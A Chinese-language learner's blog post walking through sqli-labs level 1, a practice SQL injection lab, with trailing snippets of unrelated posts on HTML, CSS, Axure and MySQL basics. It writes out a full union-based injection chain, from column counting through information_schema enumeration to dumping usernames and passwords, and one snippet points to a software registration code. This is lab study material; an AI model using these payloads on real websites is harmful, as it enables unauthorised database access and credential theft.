玩了幾天sqli-lab了是時候總結一下學過的東西了。
sqli-lab1——報錯注入
第一步,猜列數,用order by 猜列數,然後得到列數是3.
第二步,爆可回顯欄位,得到2,3列是可以回顯的。?id=0' union select 1,2,3 -- - 至於這裡為什麼要用0而不是用1是因為根據具體php而看的,在這一關用0會爆出所有資訊。
第三步,爆所有資料庫。?id=0' union select 1,2,group_concat(schema_name) from information_schema.schemata -- -
infromation_schema.schemata是乙個特殊的表,聽說show database是查詢這個表的。可以得到全部資料庫,然後就順利的得到了系統資料庫security。
第四步,爆表名。?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'-- - 然後看見一張關鍵的表users。
第五步,還是那樣,爆欄位。?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'-- - 最後愉快的發現了username和password的字段。
最後一步,爆內容。 ?id=0' union select 1,2,group_concat(username) from users -- -
?id=0' union select 1,2,group_concat(password) from users -- -
然後就得到了所有使用者資料了。。emm這一關作為入門是真的挺不錯的,很詳細,也沒有其他很複雜的思路和繞過,適合像我這樣的新手入門。
進度:sqli-lab 5/65
明日計畫:
sqli-lab 6/65
web前端第一天
什麼是html 根據w3c定義,html全稱hypertext markup language 用於定義文件的內容結構 中文全稱 超文字標記語言 2.什麼是css css英文全稱 cascading style sheets 頁面表現的基礎,可以控制布局,控制元素的渲染 用於定義html文件的樣式 ...
Web第一天 準備篇
axure 原型圖繪製 notepad filezille fscapture 截圖錄屏軟體 inletexemc 共享螢幕 axure 原型圖繪製 漢化 將lang資料夾放在axure所在目錄下 屬性開啟 fscapture 截圖錄屏軟體 註冊碼 user name team braightlin...
mysql 第一天 MySQL 系列第一天
mysql 系列第一天這篇文章是黑馬程式設計師 mysql 教程的筆記,好好學習哦。和 mysql 資料庫的互動 客戶端單向連線認證 連線伺服器,認證身份。mysql 資料庫屬於 c s 架構,所以開啟伺服器程式後,需要通過客戶端連線它。mysql 會自帶乙個客戶端程式,可以直接輸入賬號和密碼即可連...